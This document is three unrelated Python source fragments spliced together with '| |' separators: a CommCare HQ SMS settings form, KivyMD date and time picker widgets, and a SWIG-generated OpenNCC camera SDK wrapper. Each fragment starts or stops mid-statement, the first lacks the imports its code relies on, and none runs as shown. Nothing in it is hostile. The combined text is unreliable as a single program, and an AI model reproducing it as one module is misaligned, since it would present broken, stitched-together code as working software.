from corehq.apps.hqwebapp.widgets import SelectToggle
from corehq.apps.locations.models import SQLLocation
from corehq.apps.reminders.forms import validate_time
from corehq.apps.sms.models import (
FORWARD_ALL,
FORWARD_BY_KEYWORD,
SQLMobileBackend,
)
from corehq.apps.sms.util import (
ALLOWED_SURVEY_DATE_FORMATS,
get_sms_backend_classes,
strip_plus,
validate_phone_number,
)
from corehq.apps.users.models import CommCareUser
FORWARDING_CHOICES = (
(FORWARD_ALL, ugettext_noop("All messages")),
(FORWARD_BY_KEYWORD, ugettext_noop("All messages starting with a keyword")),
)
ENABLED = "ENABLED"
DISABLED = "DISABLED"
ENABLED_DISABLED_CHOICES = (
(DISABLED, ugettext_noop("Disabled")),
(ENABLED, ugettext_noop("Enabled")),
)
DEFAULT = "DEFAULT"
CUSTOM = "CUSTOM"
DEFAULT_CUSTOM_CHOICES = (
(DEFAULT, ugettext_noop("Default")),
(CUSTOM, ugettext_noop("Custom")),
)
MESSAGE_COUNTER_CHOICES = (
(DEFAULT, ugettext_noop("Don't use counter")),
(CUSTOM, ugettext_noop("Use counter with threshold:")),
)
SMS_CONVERSATION_LENGTH_CHOICES = (
(5, 5),
(10, 10),
(15, 15),
(20, 20),
(25, 25),
(30, 30),
)
SHOW_ALL = "SHOW_ALL"
SHOW_INVALID = "SHOW_INVALID"
HIDE_ALL = "HIDE_ALL"
TIME_BEFORE = "BEFORE"
TIME_AFTER = "AFTER"
TIME_BETWEEN = "BETWEEN"
WELCOME_RECIPIENT_NONE = 'NONE'
WELCOME_RECIPIENT_CASE = 'CASE'
WELCOME_RECIPIENT_MOBILE_WORKER = 'MOBILE_WORKER'
WELCOME_RECIPIENT_ALL = 'ALL'
WELCOME_RECIPIENT_CHOICES = (
(WELCOME_RECIPIENT_NONE, ugettext_lazy('Nobody')),
(WELCOME_RECIPIENT_CASE, ugettext_lazy('Cases only')),
(WELCOME_RECIPIENT_MOBILE_WORKER, ugettext_lazy('Mobile Workers only')),
(WELCOME_RECIPIENT_ALL, ugettext_lazy('Cases and Mobile Workers')),
)
class ForwardingRuleForm(Form):
forward_type = ChoiceField(choices=FORWARDING_CHOICES)
keyword = CharField(required=False)
backend_id = CharField()
def __init__(self, *args, **kwargs):
super(ForwardingRuleForm, self).__init__(*args, **kwargs)
self.helper = HQFormHelper()
self.helper.layout = crispy.Layout(
crispy.Fieldset(
_('Forwarding Rule Options'),
'forward_type',
crispy.Div(
'keyword',
css_id="keyword_row",
css_class='hide',
),
'backend_id',
hqcrispy.FormActions(
twbscrispy.StrictButton(
_("Submit"),
type="submit",
css_class="btn btn-primary",
),
),
)
)
def clean_keyword(self):
forward_type = self.cleaned_data.get("forward_type")
keyword = self.cleaned_data.get("keyword", "").strip()
if forward_type == FORWARD_BY_KEYWORD:
if keyword == "":
raise ValidationError(_("This field is required."))
return keyword
else:
return None
class LoadBalancingBackendFormMixin(Form):
phone_numbers = CharField(required=False)
def clean_phone_numbers(self):
"""
Expects a list of [{"phone_number": <phone number>}] as the value.
"""
value = self.cleaned_data.get("phone_numbers")
result = []
try:
value = json.loads(value)
assert isinstance(value, list)
for item in value:
assert isinstance(item, dict)
assert "phone_number" in item
result.append(item["phone_number"])
except (AssertionError, ValueError):
raise ValidationError(_("Something went wrong. Please reload the "
"page and try again."))
if len(result) == 0:
raise ValidationError(_("You must specify at least one phone"
"number."))
for phone_number in result:
validate_phone_number(phone_number)
return result
class SettingsForm(Form):
# General Settings
use_default_sms_response = ChoiceField(
required=False,
label=ugettext_noop("Default SMS Response"),
choices=ENABLED_DISABLED_CHOICES,
)
default_sms_response = TrimmedCharField(
required=False,
label="",
)
use_restricted_sms_times = ChoiceField(
required=False,
label=ugettext_noop("Send SMS on..."),
choices=(
(DISABLED, ugettext_noop("any day, at any time")),
(ENABLED, ugettext_noop("only specific days and times")),
),
)
restricted_sms_times_json = CharField(
required=False,
widget=forms.HiddenInput,
)
sms_survey_date_format = ChoiceField(
required=False,
label=ugettext_lazy("SMS Survey Date Format"),
choices=(
(df.human_readable_format, ugettext_lazy(df.human_readable_format))
for df in ALLOWED_SURVEY_DATE_FORMATS
),
)
# Chat Settings
use_custom_case_username = ChoiceField(
required=False,
choices=DEFAULT_CUSTOM_CHOICES,
)
custom_case_username = TrimmedCharField(
required=False,
label=ugettext_noop("Enter a Case Property"),
)
use_custom_message_count_threshold = ChoiceField(
required=False,
choices=MESSAGE_COUNTER_CHOICES,
)
custom_message_count_threshold = IntegerField(
required=False,
label=ugettext_noop("Enter a Number"),
)
use_sms_conversation_times = ChoiceField(
required=False,
label=ugettext_noop("Delay Automated SMS"),
choices=ENABLED_DISABLED_CHOICES,
widget=SelectToggle(choices=ENABLED_DISABLED_CHOICES, attrs={"ko_value": "use_sms_conversation_times"}),
)
sms_conversation_times_json = CharField(
required=False,
widget=forms.HiddenInput,
)
sms_conversation_length = ChoiceField(
required=False,
label=ugettext_noop("Conversation Duration"),
choices=SMS_CONVERSATION_LENGTH_CHOICES,
)
survey_traffic_option = ChoiceField(
required=False,
label=ugettext_noop("Survey Traffic"),
choices=(
(SHOW_ALL, ugettext_noop("Show all survey traffic")),
(SHOW_INVALID, ugettext_noop("Hide all survey traffic except "
"invalid responses")),
(HIDE_ALL, ugettext_noop("Hide all survey traffic")),
),
)
count_messages_as_read_by_anyone = ChoiceField(
required=False,
label=ugettext_noop("A Message is Read..."),
choices=(
(ENABLED, ugettext_noop("when it is read by anyone")),
(DISABLED, ugettext_noop("only for the user that reads it")),
),
)
use_custom_chat_template = ChoiceField(
required=False,
choices=DEFAULT_CUSTOM_CHOICES,
)
custom_chat_template = TrimmedCharField(
required=False,
label=ugettext_noop("Enter Chat Template Identifier"),
)
# Registration settings
sms_case_registration_enabled = ChoiceField(
required=False,
choices=ENABLED_DISABLED_CHOICES,
label=ugettext_noop("Case Self-Registration"),
)
sms_case_registration_type = TrimmedCharField(
required=False,
label=ugettext_noop("Default Case Type"),
)
sms_case_registration_owner_id = CharField(
required=False,
label=ugettext_noop("Default Case Owner"),
widget=forms.Select(choices=[]),
)
sms_case_registration_user_id = CharField(
required=False,
label=ugettext_noop("Registration Submitter"),
widget=forms.Select(choices=[]),
)
sms_mobile_worker_registration_enabled = ChoiceField(
required=False,
choices=ENABLED_DISABLED_CHOICES,
label=ugettext_noop("SMS Mobile Worker Registration"),
)
registration_welcome_message = ChoiceField(
choices=WELCOME_RECIPIENT_CHOICES,
label=ugettext_lazy("Send registration welcome message to"),
)
# Internal settings
override_daily_outbound_sms_limit = ChoiceField(
required=False,
choices=ENABLED_DISABLED_CHOICES,
label=ugettext_lazy("Override Daily Outbound SMS Limit"),
)
custom_daily_outbound_sms_limit = IntegerField(
required=False,
label=ugettext_noop("Daily Outbound SMS Limit"),
min_value=1000,
)
@property
def section_general(self):
fields = [
hqcrispy.B3MultiField(
_("Default SMS Response"),
crispy.Div(
InlineField(
"use_default_sms_response",
data_bind="value: use_default_sms_response",
),
css_class='col-sm-4'
),
crispy.Div(
InlineField(
"default_sms_response",
css_class="input-xxlarge",
placeholder=_("Enter Default Response"),
data_bind="visible: showDefaultSMSResponse",
),
css_class='col-sm-8'
),
help_bubble_text=_("Enable this option to provide a "
"default response when a user's incoming SMS does not "
"answer an open survey or match a known keyword."),
css_id="default-sms-response-group",
field_class='col-sm-6 col-md-9 col-lg-9'
),
hqcrispy.FieldWithHelpBubble(
"use_restricted_sms_times",
data_bind="value: use_restricted_sms_times",
help_bubble_text=_("Use this option to limit the times "
"that SMS messages can be sent to users. Messages that "
"are sent outside these windows will remained queued "
"and will go out as soon as another window opens up."),
),
hqcrispy.B3MultiField(
"",
hqcrispy.HiddenFieldWithErrors("restricted_sms_times_json",
data_bind="value: restricted_sms_times_json"),
crispy.Div(
data_bind="template: {"
" name: 'ko-template-restricted-sms-times', "
" data: $data"
"}",
),
data_bind="visible: showRestrictedSMSTimes",
),
hqcrispy.FieldWithHelpBubble(
'sms_survey_date_format',
help_bubble_text=_("Choose the format in which date questions "
"should be answered in SMS surveys."),
),
]
return crispy.Fieldset(
_("General Settings"),
*fields
)
@property
def section_registration(self):
fields = [
hqcrispy.FieldWithHelpBubble(
"sms_case_registration_enabled",
help_bubble_text=_("When this option is enabled, a person "
"can send an SMS into the system saying 'join "
"[project]', where [project] is your project "
"space name, and the system will automatically "
"create a case tied to that person's phone number."),
data_bind="value: sms_case_registration_enabled",
),
crispy.Div(
hqcrispy.FieldWithHelpBubble(
"sms_case_registration_type",
placeholder=_("Enter a Case Type"),
help_bubble_text=_("Cases that self-register over SMS "
"will be given this case type."),
),
hqcrispy.FieldWithHelpBubble(
"sms_case_registration_owner_id",
help_bubble_text=_("Cases that self-register over SMS "
"will be owned by this user or user group."),
),
hqcrispy.FieldWithHelpBubble(
"sms_case_registration_user_id",
help_bubble_text=_("The form submission for a "
"self-registration will belong to this user."),
),
data_bind="visible: showRegistrationOptions",
),
hqcrispy.FieldWithHelpBubble(
"sms_mobile_worker_registration_enabled",
help_bubble_text=_("When this option is enabled, a person "
"can send an SMS into the system saying 'join "
"[project] worker [username]' (where [project] is your "
" project space and [username] is an optional username)"
", and the system will add them as a mobile worker."),
),
hqcrispy.FieldWithHelpBubble(
'registration_welcome_message',
help_bubble_text=_("Choose whether to send an automatic "
"welcome message to cases, mobile workers, or both, "
"after they self-register. The welcome message can be "
"configured in the SMS languages and translations page "
"(Messaging -> Languages -> Messaging Translations)."),
),
]
return crispy.Fieldset(
_("Registration Settings"),
*fields
)
@property
def section_chat(self):
fields = [
hqcrispy.B3MultiField(
_("Case Name Display"),
crispy.Div(
InlineField(
"use_custom_case_username",
data_bind="value: use_custom_case_username",
),
css_class='col-sm-4'
),
crispy.Div(
InlineField(
"custom_case_username",
css_class="input-large",
data_bind="visible: showCustomCaseUsername",
),
css_class='col-sm-8'
),
help_bubble_text=_("By default, when chatting with a case, "
"the chat window will use the case's \"name\" case "
"property when displaying the case's name. To use a "
"different case property, specify it here."),
css_id="custom-case-username-group",
field_class='col-sm-6 col-md-9 col-lg-9'
),
hqcrispy.B3MultiField(
_("Message Counter"),
crispy.Div(
InlineField(
"use_custom_message_count_threshold",
data_bind="value: use_custom_message_count_threshold",
),
css_class='col-sm-4'
),
crispy.Div(
InlineField(
"custom_message_count_threshold",
css_class="input-large",
data_bind="visible: showCustomMessageCountThreshold",
),
css_class='col-sm-8'
),
help_bubble_text=_("The chat window can use a counter to keep "
"track of how many messages are being sent and received "
"and highlight that number after a certain threshold is "
"reached. By default, the counter is disabled. To enable "
"it, enter the desired threshold here."),
css_id="custom-message-count-threshold-group",
field_class='col-sm-6 col-md-9 col-lg-9'
),
hqcrispy.FieldWithHelpBubble(
"use_sms_conversation_times",
help_bubble_text=_("When this option is enabled, the system "
"will not send automated SMS to chat recipients when "
"those recipients are in the middle of a conversation."),
),
hqcrispy.B3MultiField(
"",
hqcrispy.HiddenFieldWithErrors("sms_conversation_times_json",
data_bind="value: sms_conversation_times_json"),
crispy.Div(
data_bind="template: {"
" name: 'ko-template-sms-conversation-times', "
" data: $data"
"}",
),
data_bind="visible: showSMSConversationTimes",
label_class='hide',
field_class='col-md-12 col-lg-10'
),
crispy.Div(
hqcrispy.FieldWithHelpBubble(
"sms_conversation_length",
help_bubble_text=_("The number of minutes to wait "
"after receiving an incoming SMS from a chat "
"recipient before resuming automated SMS to that "
"recipient."),
),
data_bind="visible: showSMSConversationTimes",
),
hqcrispy.FieldWithHelpBubble(
"survey_traffic_option",
help_bubble_text=_("This option allows you to hide a chat "
"recipient's survey questions and responses from chat "
"windows. There is also the option to show only invalid "
"responses to questions in the chat window, which could "
"be attempts to converse."),
),
hqcrispy.FieldWithHelpBubble(
"count_messages_as_read_by_anyone",
help_bubble_text=_("The chat window will mark unread "
"messages to the user viewing them. Use this option to "
"control whether a message counts as being read if it "
"is read by anyone, or if it | |
# -*- coding: utf-8 -*-
"""
Pickers
=======
Copyright (c) 2015 <NAME> and KivyMD contributors -
KivyMD library up to version 0.1.2
Copyright (c) 2019 <NAME> and KivyMD contributors -
KivyMD library version 0.1.3 and higher
For suggestions and questions:
<<EMAIL>>
This file is distributed under the terms of the same license,
as the Kivy framework.
Includes date, time and color picker
"""
import datetime
import calendar
from datetime import date
from kivy.lang import Builder
from kivy.uix.modalview import ModalView
from kivy.uix.floatlayout import FloatLayout
from kivy.properties import StringProperty, NumericProperty, ObjectProperty,\
BooleanProperty, ListProperty, OptionProperty
from kivy.uix.anchorlayout import AnchorLayout
from kivy.uix.behaviors import ButtonBehavior
from kivy.clock import Clock
from kivy.core.window import Window
from kivy.utils import get_color_from_hex
from kivymd.label import MDLabel
from kivymd.button import MDIconButton
from kivymd.theming import ThemableBehavior
from kivymd.backgroundcolorbehavior import SpecificBackgroundColorBehavior
from kivymd.ripplebehavior import CircularRippleBehavior
from kivymd.elevation import RectangularElevationBehavior
from kivymd.color_definitions import colors, palette
Builder.load_string('''
#:import calendar calendar
#:import platform platform
<MDDatePicker>
cal_layout: cal_layout
size_hint: (None, None)
size:
[dp(328), dp(484)] if self.theme_cls.device_orientation == 'portrait'\
else [dp(512), dp(304)]
pos_hint: {'center_x': .5, 'center_y': .5}
canvas:
Color:
rgb: app.theme_cls.primary_color
Rectangle:
size:
[dp(328), dp(96)]\
if self.theme_cls.device_orientation == 'portrait'\
else [dp(168), dp(304)]
pos:
[root.pos[0], root.pos[1] + root.height - dp(96)]\
if self.theme_cls.device_orientation == 'portrait'\
else [root.pos[0], root.pos[1] + root.height - dp(304)]
Color:
rgb: app.theme_cls.bg_normal
Rectangle:
size:
[dp(328), dp(484)-dp(96)]\
if self.theme_cls.device_orientation == 'portrait'\
else [dp(344), dp(304)]
pos:
[root.pos[0], root.pos[1] + root.height - dp(96) - (dp(484) - dp(96))]\
if self.theme_cls.device_orientation == 'portrait'\
else [root.pos[0] + dp(168), root.pos[1]]
MDLabel:
id: label_full_date
font_style: 'H4'
text_color: root.specific_text_color
theme_text_color: 'Custom'
size_hint: (None, None)
size:
[root.width, dp(30)]\
if root.theme_cls.device_orientation == 'portrait'\
else [dp(168), dp(30)]
pos:
[root.pos[0] + dp(23), root.pos[1] + root.height - dp(74)]\
if root.theme_cls.device_orientation == 'portrait'\
else [root.pos[0] + dp(3), root.pos[1] + dp(214)]
line_height: .84
valign: 'middle'
text_size:
[root.width, None]\
if root.theme_cls.device_orientation == 'portrait'\
else [dp(149), None]
bold: True
text:
root.fmt_lbl_date(root.sel_year, root.sel_month, root.sel_day,\
root.theme_cls.device_orientation)
MDLabel:
id: label_year
font_style: 'Subtitle1'
text_color: root.specific_text_color
theme_text_color: 'Custom'
size_hint: (None, None)
size: root.width, dp(30)
pos:
(root.pos[0] + dp(23), root.pos[1] + root.height-dp(40))\
if root.theme_cls.device_orientation == 'portrait'\
else (root.pos[0]+dp(16), root.pos[1]+root.height-dp(41))
valign: 'middle'
text: str(root.sel_year)
GridLayout:
id: cal_layout
cols: 7
size:
(dp(44 * 7), dp(40 * 7))\
if root.theme_cls.device_orientation == 'portrait'\
else (dp(46 * 7), dp(32 * 7))
col_default_width:
dp(42) if root.theme_cls.device_orientation == 'portrait'\
else dp(39)
size_hint: (None, None)
padding:
(dp(2), 0) if root.theme_cls.device_orientation == 'portrait'\
else (dp(7), 0)
spacing:
(dp(2), 0) if root.theme_cls.device_orientation == 'portrait'\
else (dp(7), 0)
pos:
(root.pos[0] + dp(10), root.pos[1] + dp(60))\
if root.theme_cls.device_orientation == 'portrait'\
else (root.pos[0] + dp(168) + dp(8), root.pos[1] + dp(48))
MDLabel:
id: label_month_selector
font_style: 'Body2'
text:
calendar.month_name[root.month].capitalize() + ' ' + str(root.year)
size_hint: (None, None)
size: root.width, dp(30)
pos: root.pos
theme_text_color: 'Primary'
pos_hint:
{'center_x': .5, 'center_y': .75}\
if self.theme_cls.device_orientation == 'portrait'\
else {'center_x': .67, 'center_y': .915}
valign: "middle"
halign: "center"
MDIconButton:
icon: 'chevron-left'
theme_text_color: 'Secondary'
pos_hint:
{'center_x': .08, 'center_y': .745}\
if root.theme_cls.device_orientation == 'portrait'\
else {'center_x': .39, 'center_y': .925}
on_release: root.change_month('prev')
MDIconButton:
icon: 'chevron-right'
theme_text_color: 'Secondary'
pos_hint:
{'center_x': .92, 'center_y': .745}\
if root.theme_cls.device_orientation == 'portrait'\
else {'center_x': .94, 'center_y': .925}
on_release: root.change_month('next')
MDFlatButton:
width: dp(32)
id: ok_button
pos:
root.pos[0] + root.size[0] - self.width - dp(10), root.pos[1] + dp(10)
text: "OK"
on_release: root.ok_click()
MDFlatButton:
id: cancel_button
pos: root.pos[0] + root.size[0] - self.width - ok_button.width - dp(10), root.pos[1] + dp(10)
text: "Cancel"
on_release: root.dismiss()
<DayButton>
size_hint: None, None
size:
(dp(40), dp(40)) if root.theme_cls.device_orientation == 'portrait'\
else (dp(32), dp(32))
MDLabel:
font_style: 'Caption'
theme_text_color:
'Custom' if root.is_today and not root.is_selected else 'Primary'
text_color: root.theme_cls.primary_color
opposite_colors:
root.is_selected if root.owner.sel_month == root.owner.month\
and root.owner.sel_year == root.owner.year\
and str(self.text) == str(root.owner.sel_day) else False
size_hint_x: None
valign: 'middle'
halign: 'center'
text: root.text
<WeekdayLabel>
font_style: 'Caption'
theme_text_color: 'Secondary'
size: (dp(40), dp(40)) if root.theme_cls.device_orientation == 'portrait'\
else (dp(32), dp(32))
size_hint: None, None
text_size: self.size
valign:
'middle' if root.theme_cls.device_orientation == 'portrait'\
else 'bottom'
halign: 'center'
<DaySelector>
size:
(dp(40), dp(40)) if root.theme_cls.device_orientation == 'portrait'\
else (dp(32), dp(32))
size_hint: (None, None)
canvas:
Color:
rgba: self.theme_cls.primary_color if self.shown else [0, 0, 0, 0]
Ellipse:
size:
(dp(40), dp(40))\
if root.theme_cls.device_orientation == 'portrait'\
else (dp(32), dp(32))
pos:
self.pos if root.theme_cls.device_orientation == 'portrait'\
else [self.pos[0], self.pos[1]]
''')
class DaySelector(ThemableBehavior, AnchorLayout):
shown = BooleanProperty(False)
def __init__(self, parent):
super(DaySelector, self).__init__()
self.parent_class = parent
self.parent_class.add_widget(self, index=7)
self.selected_widget = None
Window.bind(on_resize=self.move_resize)
def update(self):
parent = self.parent_class
if parent.sel_month == parent.month and parent.sel_year == parent.year:
self.shown = True
else:
self.shown = False
def set_widget(self, widget):
self.selected_widget = widget
self.pos = widget.pos
self.move_resize(do_again=True)
self.update()
def move_resize(self, window=None, width=None, height=None, do_again=True):
self.pos = self.selected_widget.pos
if do_again:
Clock.schedule_once(
lambda x: self.move_resize(do_again=False), .01)
class DayButton(ThemableBehavior, CircularRippleBehavior, ButtonBehavior,
AnchorLayout):
text = StringProperty()
owner = ObjectProperty()
is_today = BooleanProperty(False)
is_selected = BooleanProperty(False)
def on_release(self):
self.owner.set_selected_widget(self)
class WeekdayLabel(MDLabel):
pass
class MDDatePicker(FloatLayout, ThemableBehavior, RectangularElevationBehavior,
SpecificBackgroundColorBehavior, ModalView):
_sel_day_widget = ObjectProperty()
cal_list = None
cal_layout = ObjectProperty()
sel_year = NumericProperty()
sel_month = NumericProperty()
sel_day = NumericProperty()
day = NumericProperty()
month = NumericProperty()
year = NumericProperty()
today = date.today()
callback = ObjectProperty()
background_color = ListProperty([0, 0, 0, .7])
class SetDateError(Exception):
pass
def __init__(self, callback, year=None, month=None, day=None,
firstweekday=0, **kwargs):
self.callback = callback
self.cal = calendar.Calendar(firstweekday)
self.sel_year = year if year else self.today.year
self.sel_month = month if month else self.today.month
self.sel_day = day if day else self.today.day
self.month = self.sel_month
self.year = self.sel_year
self.day = self.sel_day
super(MDDatePicker, self).__init__(**kwargs)
self.selector = DaySelector(parent=self)
self.generate_cal_widgets()
self.update_cal_matrix(self.sel_year, self.sel_month)
self.set_month_day(self.sel_day)
self.selector.update()
def ok_click(self):
self.callback(date(self.sel_year, self.sel_month, self.sel_day))
self.dismiss()
def fmt_lbl_date(self, year, month, day, orientation):
d = datetime.date(int(year), int(month), int(day))
separator = '\n' if orientation == 'landscape' else ' '
return d.strftime('%a,').capitalize() + separator + d.strftime(
'%b').capitalize() + ' ' + str(day).lstrip('0')
def set_date(self, year, month, day):
try:
date(year, month, day)
except Exception as e:
print(e)
if str(e) == "day is out of range for month":
raise self.SetDateError(
" Day %s day is out of range for month %s" % (day, month))
elif str(e) == "month must be in 1..12":
raise self.SetDateError(
"Month must be between 1 and 12, got %s" % month)
elif str(e) == "year is out of range":
raise self.SetDateError(
"Year must be between %s and %s, got %s" % (
datetime.MINYEAR, datetime.MAXYEAR, year))
else:
self.sel_year = year
self.sel_month = month
self.sel_day = day
self.month = self.sel_month
self.year = self.sel_year
self.day = self.sel_day
self.update_cal_matrix(self.sel_year, self.sel_month)
self.set_month_day(self.sel_day)
self.selector.update()
def set_selected_widget(self, widget):
if self._sel_day_widget:
self._sel_day_widget.is_selected = False
widget.is_selected = True
self.sel_month = int(self.month)
self.sel_year = int(self.year)
self.sel_day = int(widget.text)
self._sel_day_widget = widget
self.selector.set_widget(widget)
def set_month_day(self, day):
for idx in range(len(self.cal_list)):
if str(day) == str(self.cal_list[idx].text):
self._sel_day_widget = self.cal_list[idx]
self.sel_day = int(self.cal_list[idx].text)
if self._sel_day_widget:
self._sel_day_widget.is_selected = False
self._sel_day_widget = self.cal_list[idx]
self.cal_list[idx].is_selected = True
self.selector.set_widget(self.cal_list[idx])
def update_cal_matrix(self, year, month):
try:
dates = [x for x in self.cal.itermonthdates(year, month)]
except ValueError as e:
if str(e) == "year is out of range":
pass
else:
self.year = year
self.month = month
for idx in range(len(self.cal_list)):
if idx >= len(dates) or dates[idx].month != month:
self.cal_list[idx].disabled = True
self.cal_list[idx].text = ''
else:
self.cal_list[idx].disabled = False
self.cal_list[idx].text = str(dates[idx].day)
self.cal_list[idx].is_today = dates[idx] == self.today
self.selector.update()
def generate_cal_widgets(self):
cal_list = []
for day in self.cal.iterweekdays():
self.cal_layout.add_widget(
WeekdayLabel(text=calendar.day_abbr[day][0].upper()))
for i in range(6 * 7): # 6 weeks, 7 days a week
db = DayButton(owner=self)
cal_list.append(db)
self.cal_layout.add_widget(db)
self.cal_list = cal_list
def change_month(self, operation):
op = 1 if operation is 'next' else -1
sl, sy = self.month, self.year
m = 12 if sl + op == 0 else 1 if sl + op == 13 else sl + op
y = sy - 1 if sl + op == 0 else sy + 1 if sl + op == 13 else sy
self.update_cal_matrix(y, m)
Builder.load_string('''
#:import MDFlatButton kivymd.button.MDFlatButton
#:import CircularTimePicker kivymd.vendor.circularTimePicker.CircularTimePicker
#:import dp kivy.metrics.dp
<MDTimePicker>
size_hint: (None, None)
size: [dp(270), dp(335) + dp(95)]
pos_hint: {'center_x': .5, 'center_y': .5}
canvas:
Color:
rgba: self.theme_cls.bg_light
Rectangle:
size: [dp(270), dp(335)]
pos: [root.pos[0], root.pos[1] + root.height - dp(335) - dp(95)]
Color:
rgba: self.theme_cls.primary_color
Rectangle:
size: [dp(270), dp(95)]
pos: [root.pos[0], root.pos[1] + root.height - dp(95)]
Color:
rgba: self.theme_cls.bg_dark
Ellipse:
size: [dp(220), dp(220)]
pos:
root.pos[0] + dp(270) / 2 - dp(220) / 2, root.pos[1]\
+ root.height - (dp(335) / 2 + dp(95)) - dp(220) / 2 + dp(35)
CircularTimePicker:
id: time_picker
pos: (dp(270) / 2) - (self.width / 2), root.height - self.height
size_hint: [.8, .8]
pos_hint: {'center_x': .5, 'center_y': .585}
MDFlatButton:
width: dp(32)
id: ok_button
pos:
root.pos[0] + root.size[0] - | |
<reponame>EyecloudAi/OpenNCC-SDK
# This file was automatically generated by SWIG (http://www.swig.org).
# Version 3.0.8
#
# Do not make changes to this file unless you know what you are doing--modify
# the SWIG interface file instead.
from sys import version_info
if version_info >= (2, 6, 0):
def swig_import_helper():
from os.path import dirname
import imp
fp = None
try:
fp, pathname, description = imp.find_module('_openncc', [dirname(__file__)])
except ImportError:
import _openncc
return _openncc
if fp is not None:
try:
_mod = imp.load_module('_openncc', fp, pathname, description)
finally:
fp.close()
return _mod
_openncc = swig_import_helper()
del swig_import_helper
else:
import _openncc
del version_info
try:
_swig_property = property
except NameError:
pass # Python < 2.2 doesn't have 'property'.
def _swig_setattr_nondynamic(self, class_type, name, value, static=1):
if (name == "thisown"):
return self.this.own(value)
if (name == "this"):
if type(value).__name__ == 'SwigPyObject':
self.__dict__[name] = value
return
method = class_type.__swig_setmethods__.get(name, None)
if method:
return method(self, value)
if (not static):
if _newclass:
object.__setattr__(self, name, value)
else:
self.__dict__[name] = value
else:
raise AttributeError("You cannot add attributes to %s" % self)
def _swig_setattr(self, class_type, name, value):
return _swig_setattr_nondynamic(self, class_type, name, value, 0)
def _swig_getattr_nondynamic(self, class_type, name, static=1):
if (name == "thisown"):
return self.this.own()
method = class_type.__swig_getmethods__.get(name, None)
if method:
return method(self)
if (not static):
return object.__getattr__(self, name)
else:
raise AttributeError(name)
def _swig_getattr(self, class_type, name):
return _swig_getattr_nondynamic(self, class_type, name, 0)
def _swig_repr(self):
try:
strthis = "proxy of " + self.this.__repr__()
except Exception:
strthis = ""
return "<%s.%s; %s >" % (self.__class__.__module__, self.__class__.__name__, strthis,)
try:
_object = object
_newclass = 1
except AttributeError:
class _object:
pass
_newclass = 0
_openncc.YUV420p_swigconstant(_openncc)
YUV420p = _openncc.YUV420p
_openncc.RAW14_swigconstant(_openncc)
RAW14 = _openncc.RAW14
_openncc.H26X_swigconstant(_openncc)
H26X = _openncc.H26X
_openncc.JPEG_swigconstant(_openncc)
JPEG = _openncc.JPEG
_openncc.METEDATA_swigconstant(_openncc)
METEDATA = _openncc.METEDATA
_openncc.MONO_swigconstant(_openncc)
MONO = _openncc.MONO
_openncc.DEPTH_swigconstant(_openncc)
DEPTH = _openncc.DEPTH
_openncc.OUTPUT_INDEX_SIZE_swigconstant(_openncc)
OUTPUT_INDEX_SIZE = _openncc.OUTPUT_INDEX_SIZE
_openncc.USB_SUCCESS_swigconstant(_openncc)
USB_SUCCESS = _openncc.USB_SUCCESS
_openncc.USB_ERROR_IO_swigconstant(_openncc)
USB_ERROR_IO = _openncc.USB_ERROR_IO
_openncc.USB_ERROR_INVALID_PARAM_swigconstant(_openncc)
USB_ERROR_INVALID_PARAM = _openncc.USB_ERROR_INVALID_PARAM
_openncc.USB_ERROR_ACCESS_swigconstant(_openncc)
USB_ERROR_ACCESS = _openncc.USB_ERROR_ACCESS
_openncc.USB_ERROR_NO_DEVICE_swigconstant(_openncc)
USB_ERROR_NO_DEVICE = _openncc.USB_ERROR_NO_DEVICE
_openncc.USB_ERROR_NOT_FOUND_swigconstant(_openncc)
USB_ERROR_NOT_FOUND = _openncc.USB_ERROR_NOT_FOUND
_openncc.USB_ERROR_BUSY_swigconstant(_openncc)
USB_ERROR_BUSY = _openncc.USB_ERROR_BUSY
_openncc.USB_ERROR_TIMEOUT_swigconstant(_openncc)
USB_ERROR_TIMEOUT = _openncc.USB_ERROR_TIMEOUT
_openncc.USB_ERROR_OVERFLOW_swigconstant(_openncc)
USB_ERROR_OVERFLOW = _openncc.USB_ERROR_OVERFLOW
_openncc.USB_ERROR_PIPE_swigconstant(_openncc)
USB_ERROR_PIPE = _openncc.USB_ERROR_PIPE
_openncc.USB_ERROR_INTERRUPTED_swigconstant(_openncc)
USB_ERROR_INTERRUPTED = _openncc.USB_ERROR_INTERRUPTED
_openncc.USB_ERROR_NO_MEM_swigconstant(_openncc)
USB_ERROR_NO_MEM = _openncc.USB_ERROR_NO_MEM
_openncc.USB_ERROR_NOT_SUPPORTED_swigconstant(_openncc)
USB_ERROR_NOT_SUPPORTED = _openncc.USB_ERROR_NOT_SUPPORTED
_openncc.USB_ERROR_OTHER_swigconstant(_openncc)
USB_ERROR_OTHER = _openncc.USB_ERROR_OTHER
_openncc.IMG_FORMAT_GRAY_swigconstant(_openncc)
IMG_FORMAT_GRAY = _openncc.IMG_FORMAT_GRAY
_openncc.IMG_FORMAT_I420_swigconstant(_openncc)
IMG_FORMAT_I420 = _openncc.IMG_FORMAT_I420
_openncc.IMG_FORMAT_I422_swigconstant(_openncc)
IMG_FORMAT_I422 = _openncc.IMG_FORMAT_I422
_openncc.IMG_FORMAT_I444_swigconstant(_openncc)
IMG_FORMAT_I444 = _openncc.IMG_FORMAT_I444
_openncc.IMG_FORMAT_YUV444_swigconstant(_openncc)
IMG_FORMAT_YUV444 = _openncc.IMG_FORMAT_YUV444
_openncc.IMG_FORMAT_RGB_swigconstant(_openncc)
IMG_FORMAT_RGB = _openncc.IMG_FORMAT_RGB
_openncc.IMG_FORMAT_RGB_PLANAR_swigconstant(_openncc)
IMG_FORMAT_RGB_PLANAR = _openncc.IMG_FORMAT_RGB_PLANAR
_openncc.IMG_FORMAT_BGR_swigconstant(_openncc)
IMG_FORMAT_BGR = _openncc.IMG_FORMAT_BGR
_openncc.IMG_FORMAT_BGR_PLANAR_swigconstant(_openncc)
IMG_FORMAT_BGR_PLANAR = _openncc.IMG_FORMAT_BGR_PLANAR
_openncc.ENCODE_H264_MODE_swigconstant(_openncc)
ENCODE_H264_MODE = _openncc.ENCODE_H264_MODE
_openncc.ENCODE_H265_MODE_swigconstant(_openncc)
ENCODE_H265_MODE = _openncc.ENCODE_H265_MODE
class CameraInfo(_object):
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, CameraInfo, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, CameraInfo, name)
__repr__ = _swig_repr
__swig_setmethods__["imageWidth"] = _openncc.CameraInfo_imageWidth_set
__swig_getmethods__["imageWidth"] = _openncc.CameraInfo_imageWidth_get
if _newclass:
